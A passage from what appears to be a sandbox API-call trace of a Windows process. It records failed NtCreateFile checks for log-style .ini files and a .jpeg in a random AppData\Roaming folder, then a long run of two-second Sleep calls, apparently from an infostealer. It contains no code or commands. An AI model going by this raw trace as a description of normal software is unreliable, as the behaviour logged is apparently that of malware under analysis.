EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.787] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.787] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fbb0) returned 1 [0190.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.787] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.787] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.787] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fcd0) returned 1 [0190.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.787] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.787] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.787] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fcd0) returned 1 [0190.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.787] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.787] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.787] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8950150) returned 1 [0190.787] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.787] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.788] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.788] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894ee30) returned 1 [0190.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.788] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.788] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.788] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fbb0) returned 1 [0190.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.788] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.788] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.788] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f610) returned 1 [0190.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.788] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.788] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.788] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8950150) returned 1 [0190.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.788] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.788] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0190.788] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894f610) returned 1 [0190.788] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.788] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0190.788] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0190.789] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x894fbb0) returned 1 [0190.789] Sleep (dwMilliseconds=0x7d0) [0190.790] Sleep (dwMilliseconds=0x7d0) [0190.791] Sleep (dwMilliseconds=0x7d0) [0190.793] Sleep (dwMilliseconds=0x7d0) [0190.794] Sleep (dwMilliseconds=0x7d0) [0190.796] Sleep (dwMilliseconds=0x7d0) [0190.797] Sleep (dwMilliseconds=0x7d0) [0190.799] Sleep (dwMilliseconds=0x7d0) [0190.800] Sleep (dwMilliseconds=0x7d0) [0190.802] Sleep (dwMilliseconds=0x7d0) [0190.803] Sleep (dwMilliseconds=0x7d0) [0190.805] Sleep (dwMilliseconds=0x7d0) [0190.806] Sleep (dwMilliseconds=0x7d0) [0190.856] Sleep (dwMilliseconds=0x7d0) [0190.858] Sleep (dwMilliseconds=0x7d0) [0190.859] Sleep (dwMilliseconds=0x7d0) [0190.862] Sleep (dwMilliseconds=0x7d0) [0190.865] Sleep (dwMilliseconds=0x7d0) [0190.867] Sleep (dwMilliseconds=0x7d0) [0190.869] Sleep (dwMilliseconds=0x7d0) [0190.870] Sleep (dwMilliseconds=0x7d0) [0190.872] Sleep (dwMilliseconds=0x7d0) [0190.873] Sleep (dwMilliseconds=0x7d0) [0190.875] Sleep (dwMilliseconds=0x7d0) [0190.877] Sleep (dwMilliseconds=0x7d0) [0190.879] Sleep (dwMilliseconds=0x7d0) [0190.880] Sleep (dwMilliseconds=0x7d0) [0190.882] Sleep (dwMilliseconds=0x7d0) [0190.884] Sleep (dwMilliseconds=0x7d0) [0190.897] Sleep (dwMilliseconds=0x7d0) [0190.899] Sleep (dwMilliseconds=0x7d0) [0190.900] Sleep (dwMilliseconds=0x7d0) [0190.902] Sleep (dwMilliseconds=0x7d0) [0190.903] Sleep (dwMilliseconds=0x7d0) [0190.905] Sleep (dwMilliseconds=0x7d0) [0190.906] Sleep (dwMilliseconds=0x7d0) [0190.908] Sleep (dwMilliseconds=0x7d0) [0190.909] Sleep (dwMilliseconds=0x7d0) [0190.911] Sleep (dwMilliseconds=0x7d0) [0190.912] Sleep (dwMilliseconds=0x7d0) [0190.914] Sleep (dwMilliseconds=0x7d0) [0190.915] Sleep (dwMilliseconds=0x7d0) [0190.917] Sleep (dwMilliseconds=0x7d0) [0190.918] Sleep (dwMilliseconds=0x7d0) [0190.920] Sleep (dwMilliseconds=0x7d0) [0190.921] Sleep (dwMilliseconds=0x7d0) [0190.923] Sleep (dwMilliseconds=0x7d0) [0190.925] Sleep (dwMilliseconds=0x7d0) [0190.926] Sleep (dwMilliseconds=0x7d0) [0190.940] Sleep (dwMilliseconds=0x7d0) [0190.941] Sleep (dwMilliseconds=0x7d0) [0190.943] Sleep (dwMilliseconds=0x7d0) [0190.944] Sleep (dwMilliseconds=0x7d0) [0190.946] Sleep (dwMilliseconds=0x7d0) [0190.947] Sleep (dwMilliseconds=0x7d0) [0190.949] Sleep (dwMilliseconds=0x7d0) [0190.950] Sleep (dwMilliseconds=0x7d0) [0190.952] Sleep (dwMilliseconds=0x7d0) [0190.953] Sleep (dwMilliseconds=0x7d0) [0190.955] Sleep (dwMilliseconds=0x7d0) [0190.956] Sleep (dwMilliseconds=0x7d0) [0190.958] Sleep (dwMilliseconds=0x7d0) [0190.959] Sleep (dwMilliseconds=0x7d0) [0190.961] Sleep (dwMilliseconds=0x7d0) [0190.962] Sleep (dwMilliseconds=0x7d0) [0190.964] Sleep (dwMilliseconds=0x7d0) [0190.965] Sleep (dwMilliseconds=0x7d0) [0190.982] Sleep (dwMilliseconds=0x7d0) [0190.984] Sleep (dwMilliseconds=0x7d0) [0190.985] Sleep (dwMilliseconds=0x7d0) [0190.987] Sleep (dwMilliseconds=0x7d0) [0190.988] Sleep (dwMilliseconds=0x7d0) [0190.990] Sleep (dwMilliseconds=0x7d0) [0190.992] Sleep (dwMilliseconds=0x7d0) [0190.993] Sleep (dwMilliseconds=0x7d0) [0190.995] Sleep (dwMilliseconds=0x7d0) [0190.996] Sleep (dwMilliseconds=0x7d0) [0190.998] Sleep (dwMilliseconds=0x7d0) [0190.999] Sleep (dwMilliseconds=0x7d0) [0191.001] Sleep (dwMilliseconds=0x7d0) [0191.002] Sleep (dwMilliseconds=0x7d0) [0191.004] Sleep (dwMilliseconds=0x7d0) [0191.005] Sleep (dwMilliseconds=0x7d0) [0191.007] Sleep (dwMilliseconds=0x7d0) [0191.008] Sleep (dwMilliseconds=0x7d0) [0191.010] Sleep (dwMilliseconds=0x7d0) [0191.011] Sleep (dwMilliseconds=0x7d0) [0191.013] Sleep (dwMilliseconds=0x7d0) [0191.014] Sleep (dwMilliseconds=0x7d0) [0191.016] Sleep (dwMilliseconds=0x7d0) [0191.017] Sleep (dwMilliseconds=0x7d0) [0191.019] Sleep (dwMilliseconds=0x7d0) [0191.020] Sleep (dwMilliseconds=0x7d0) [0191.022] Sleep (dwMilliseconds=0x7d0) [0191.024] Sleep (dwMilliseconds=0x7d0) [0191.026] Sleep (dwMilliseconds=0x7d0) [0191.027] Sleep (dwMilliseconds=0x7d0) [0191.029] Sleep (dwMilliseconds=0x7d0) [0191.030] Sleep (dwMilliseconds=0x7d0) [0191.032] Sleep (dwMilliseconds=0x7d0) [0191.033] Sleep (dwMilliseconds=0x7d0) [0191.035] Sleep (dwMilliseconds=0x7d0) [0191.036] Sleep (dwMilliseconds=0x7d0) [0191.038] Sleep (dwMilliseconds=0x7d0) [0191.039] Sleep (dwMilliseconds=0x7d0) [0191.041] Sleep (dwMilliseconds=0x7d0) [0191.042] Sleep (dwMilliseconds=0x7d0) [0191.044] Sleep (dwMilliseconds=0x7d0) [0191.045] Sleep (dwMilliseconds=0x7d0) [0191.047] Sleep (dwMilliseconds=0x7d0) [0191.048] Sleep (dwMilliseconds=0x7d0) [0191.050] Sleep (dwMilliseconds=0x7d0) [0191.051] Sleep (dwMilliseconds=0x7d0) [0191.053] Sleep (dwMilliseconds=0x7d0) [0191.054] Sleep (dwMilliseconds=0x7d0) [0191.056] Sleep (dwMilliseconds=0x7d0) [0191.057] Sleep (dwMilliseconds=0x7d0) [0191.059] Sleep (dwMilliseconds=0x7d0) [0191.060] Sleep (dwMilliseconds=0x7d0) [0191.062] Sleep (dwMilliseconds=0x7d0) [0191.063] Sleep (dwMilliseconds=0x7d0) [0191.065] Sleep (dwMilliseconds=0x7d0) [0191.071] Sleep (dwMilliseconds=0x7d0) [0191.073] Sleep (dwMilliseconds=0x7d0) [0191.074] Sleep (dwMilliseconds=0x7d0) [0191.076] Sleep (dwMilliseconds=0x7d0) [0191.077] Sleep (dwMilliseconds=0x7d0) [0191.079] Sleep (dwMilliseconds=0x7d0) [0191.080] Sleep (dwMilliseconds=0x7d0) [0191.082] Sleep (dwMilliseconds=0x7d0) [0191.083] Sleep (dwMilliseconds=0x7d0) [0191.085] Sleep (dwMilliseconds=0x7d0) [0191.086] Sleep (dwMilliseconds=0x7d0) [0191.088] Sleep (dwMilliseconds=0x7d0) [0191.089] Sleep (dwMilliseconds=0x7d0) [0191.091] Sleep (dwMilliseconds=0x7d0) [0191.092] Sleep (dwMilliseconds=0x7d0) [0191.094] Sleep (dwMilliseconds=0x7d0) [0191.095] Sleep (dwMilliseconds=0x7d0) [0191.097] Sleep (dwMilliseconds=0x7d0) [0191.098] Sleep (dwMilliseconds=0x7d0) [0191.100] Sleep (dwMilliseconds=0x7d0) [0191.101] Sleep (dwMilliseconds=0x7d0) [0191.103] Sleep (dwMilliseconds=0x7d0) [0191.104] Sleep (dwMilliseconds=0x7d0) [0191.106] Sleep (dwMilliseconds=0x7d0) [0191.107] Sleep (dwMilliseconds=0x7d0) [0191.109] Sleep (dwMilliseconds=0x7d0) [0191.110] Sleep (dwMilliseconds=0x7d0) [0191.112] Sleep (dwMilliseconds=0x7d0) [0191.113] Sleep (dwMilliseconds=0x7d0) [0191.115] Sleep (dwMilliseconds=0x7d0) [0191.116] Sleep (dwMilliseconds=0x7d0) [0191.118] Sleep (dwMilliseconds=0x7d0) [0191.119] Sleep (dwMilliseconds=0x7d0) [0191.121] Sleep (dwMilliseconds=0x7d0) [0191.122] Sleep (dwMilliseconds=0x7d0) [0191.124] Sleep (dwMilliseconds=0x7d0) [0191.126] Sleep (dwMilliseconds=0x7d0) [0191.128] Sleep (dwMilliseconds=0x7d0) [0191.129] Sleep (dwMilliseconds=0x7d0) [0191.131] Sleep (dwMilliseconds=0x7d0) [0191.132] Sleep (dwMilliseconds=0x7d0) [0191.134] Sleep (dwMilliseconds=0x7d0) [0191.135] Sleep (dwMilliseconds=0x7d0) [0191.137] Sleep (dwMilliseconds=0x7d0) [0191.138] Sleep (dwMilliseconds=0x7d0) [0191.140] Sleep (dwMilliseconds=0x7d0) [0191.141] Sleep (dwMilliseconds=0x7d0) [0191.143] Sleep (dwMilliseconds=0x7d0) [0191.145] Sleep (dwMilliseconds=0x7d0) [0191.146] Sleep (dwMilliseconds=0x7d0) [0191.148] Sleep (dwMilliseconds=0x7d0) [0191.149] Sleep (dwMilliseconds=0x7d0) [0191.151] Sleep (dwMilliseconds=0x7d0) [0191.152] Sleep (dwMilliseconds=0x7d0) [0191.154] Sleep (dwMilliseconds=0x7d0) [0191.155] Sleep (dwMilliseconds=0x7d0) [0191.157] Sleep (dwMilliseconds=0x7d0) [0191.158] Sleep (dwMilliseconds=0x7d0) [0191.160] Sleep (dwMilliseconds=0x7d0) [0191.161] Sleep (dwMilliseconds=0x7d0) [0191.163] Sleep (dwMilliseconds=0x7d0) [0191.164] Sleep (dwMilliseconds=0x7d0) [0191.166] Sleep (dwMilliseconds=0x7d0) [0191.167] Sleep (dwMilliseconds=0x7d0) [0191.169] Sleep (dwMilliseconds=0x7d0) [0191.170] Sleep (dwMilliseconds=0x7d0) [0191.172] Sleep (dwMilliseconds=0x7d0) [0191.173] Sleep (dwMilliseconds=0x7d0) [0191.175] Sleep (dwMilliseconds=0x7d0) [0191.176] Sleep (dwMilliseconds=0x7d0) [0191.178] Sleep (dwMilliseconds=0x7d0) [0191.179] Sleep (dwMilliseconds=0x7d0) [0191.181] Sleep (dwMilliseconds=0x7d0) [0191.182] Sleep (dwMilliseconds=0x7d0) [0191.184] Sleep (dwMilliseconds=0x7d0) [0191.185] Sleep (dwMilliseconds=0x7d0) [0191.187] Sleep (dwMilliseconds=0x7d0) [0191.188] Sleep (dwMilliseconds=0x7d0) [0191.190] Sleep (dwMilliseconds=0x7d0) [0191.191] Sleep (dwMilliseconds=0x7d0) [0191.193] Sleep (dwMilliseconds=0x7d0) [0191.195] Sleep (dwMilliseconds=0x7d0) [0191.196] Sleep (dwMilliseconds=0x7d0) [0191.198] Sleep (dwMilliseconds=0x7d0) [0191.199] Sleep (dwMilliseconds=0x7d0) [0191.201] Sleep (dwMilliseconds=0x7d0) [0191.202] Sleep (dwMilliseconds=0x7d0) [0191.203] Sleep (dwMilliseconds=0x7d0) [0191.205] Sleep (dwMilliseconds=0x7d0) [0191.206] Sleep (dwMilliseconds=0x7d0) [0191.208] Sleep (dwMilliseconds=0x7d0) [0191.209] Sleep (dwMilliseconds=0x7d0) [0191.211] Sleep (dwMilliseconds=0x7d0) [0191.212] Sleep (dwMilliseconds=0x7d0) [0191.214] Sleep (dwMilliseconds=0x7d0) [0191.215] Sleep (dwMilliseconds=0x7d0) [0191.217] Sleep (dwMilliseconds=0x7d0) [0191.218] Sleep (dwMilliseconds=0x7d0) [0191.220] Sleep (dwMilliseconds=0x7d0) [0191.221] Sleep (dwMilliseconds=0x7d0) [0191.223] Sleep (dwMilliseconds=0x7d0) [0191.225] Sleep (dwMilliseconds=0x7d0) [0191.227] Sleep (dwMilliseconds=0x7d0) [0191.228] Sleep (dwMilliseconds=0x7d0) [0191.230] Sleep (dwMilliseconds=0x7d0) [0191.231] Sleep (dwMilliseconds=0x7d0) [0191.233] Sleep (dwMilliseconds=0x7d0) [0191.236] Sleep (dwMilliseconds=0x7d0) [0191.238] Sleep (dwMilliseconds=0x7d0) [0191.239] Sleep (dwMilliseconds=0x7d0) [0191.241] Sleep (dwMilliseconds=0x7d0) [0191.242] Sleep (dwMilliseconds=0x7d0) [0191.244] Sleep (dwMilliseconds=0x7d0) [0191.245] Sleep (dwMilliseconds=0x7d0) [0191.247] Sleep (dwMilliseconds=0x7d0) [0191.248] Sleep (dwMilliseconds=0x7d0) [0191.252] Sleep (dwMilliseconds=0x7d0) [0191.287] Sleep (dwMilliseconds=0x7d0) [0191.288] Sleep (dwMilliseconds=0x7d0) [0191.290] Sleep (dwMilliseconds=0x7d0) [0191.291] Sleep (dwMilliseconds=0x7d0) [0191.293] Sleep (dwMilliseconds=0x7d0) [0191.294] Sleep (dwMilliseconds=0x7d0) [0191.296] Sleep (dwMilliseconds=0x7d0) [0191.297] Sleep (dwMilliseconds=0x7d0) [0191.299] Sleep (dwMilliseconds=0x7d0) [0191.300] Sleep (dwMilliseconds=0x7d0) [0191.302] Sleep (dwMilliseconds=0x7d0) [0191.303] Sleep (dwMilliseconds=0x7d0) [0191.305] Sleep (dwMilliseconds=0x7d0) [0191.306] Sleep (dwMilliseconds=0x7d0) [0191.308] Sleep (dwMilliseconds=0x7d0) [0191.309] Sleep (dwMilliseconds=0x7d0) [0191.311] Sleep (dwMilliseconds=0x7d0) [0191.312] Sleep (dwMilliseconds=0x7d0) [0191.314] Sleep (dwMilliseconds=0x7d0) [0191.315] Sleep (dwMilliseconds=0x7d0) [0191.317] Sleep (dwMilliseconds=0x7d0) [0191.318] Sleep (dwMilliseconds=0x7d0) [0191.320] Sleep (dwMilliseconds=0x7d0) [0191.321] Sleep (dwMilliseconds=0x7d0) [0191.323] Sleep (dwMilliseconds=0x7d0) [0191.325] Sleep (dwMilliseconds=0x7d0) [0191.326] Sleep (dwMilliseconds=0x7d0) [0191.328] Sleep (dwMilliseconds=0x7d0) [0191.329] Sleep (dwMilliseconds=0x7d0) [0191.331] Sleep (dwMilliseconds=0x7d0) [0191.332] Sleep (dwMilliseconds=0x7d0) [0191.334] Sleep (dwMilliseconds=0x7d0) [0191.335] Sleep (dwMilliseconds=0x7d0) [0191.337] Sleep (dwMilliseconds=0x7d0) [0191.338] Sleep (dwMilliseconds=0x7d0) [0191.340] Sleep (dwMilliseconds=0x7d0) [0191.341] Sleep (dwMilliseconds=0x7d0) [0191.343] Sleep (dwMilliseconds=0x7d0) [0191.344] Sleep (dwMilliseconds=0x7d0) [0191.346] Sleep (dwMilliseconds=0x7d0) [0191.347] Sleep (dwMilliseconds=0x7d0) [0191.349] Sleep (dwMilliseconds=0x7d0) [0191.350] Sleep (dwMilliseconds=0x7d0) [0191.352] Sleep (dwMilliseconds=0x7d0) [0191.353] Sleep (dwMilliseconds=0x7d0) [0191.355] Sleep (dwMilliseconds=0x7d0) [0191.356] Sleep (dwMilliseconds=0x7d0) [0191.358] Sleep (dwMilliseconds=0x7d0) [0191.359] Sleep (dwMilliseconds=0x7d0) [0191.361] Sleep (dwMilliseconds=0x7d0) [0191.362] Sleep (dwMilliseconds=0x7d0) [0191.364] Sleep (dwMilliseconds=0x7d0) [0191.365] Sleep (dwMilliseconds=0x7d0) [0191.367] Sleep (dwMilliseconds=0x7d0) [0191.368] Sleep (dwMilliseconds=0x7d0) [0191.370] Sleep (dwMilliseconds=0x7d0) [0191.371] Sleep (dwMilliseconds=0x7d0) [0191.373] Sleep (dwMilliseconds=0x7d0) [0191.374] 